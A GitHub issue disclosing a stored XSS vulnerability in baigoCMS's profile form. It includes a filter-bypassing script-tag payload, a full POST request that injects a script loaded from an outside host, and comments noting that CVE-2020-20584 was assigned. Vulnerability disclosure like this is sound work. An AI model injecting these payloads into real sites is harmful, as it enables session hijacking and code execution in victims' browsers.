Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a stored XSS vulnerability #13

Open
Q1ngShan opened this issue Oct 10, 2019 · 3 comments
Open

There is a stored XSS vulnerability #13

Q1ngShan opened this issue Oct 10, 2019 · 3 comments

Comments

@Q1ngShan
Copy link

Vulnerability description

A xss vulnerability was discovered in baigoCMS.
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the
/public/console/profile/info-submit/

POC:

xss payload:<sCRiPt/SrC=//your js>

POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E

Submit this form, after refreshing, you can find that our xss statement was successfully executed.
image
image
image
image

Vulnerability Analysis

Filename:app/ctrl/console/profile.ctrl.php function:infoSubmit Line 70 ,It filters the content on the input.
image
image
Continue to follow up on this process
image
Because the incoming argument is an array, it will go into the fillParam method of line 352.
image
image
In the 826 line, enter the safe function to filter the input content.
image
image
Filtering the input content by xss and sql injection.But we can bypass this.
payload:

<sCRiPt/SrC=//js>
@fonering
Copy link
Contributor

Thank you!

@fgeek
Copy link

fgeek commented Jul 9, 2021

CVE-2020-20584 was assigned for this vulnerability.

@fgeek
Copy link

fgeek commented Jul 9, 2021

@Q1ngShan shouldn't this be reported under https://github.com/baigoStudio/baigoCMS instead of baigoSSO?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants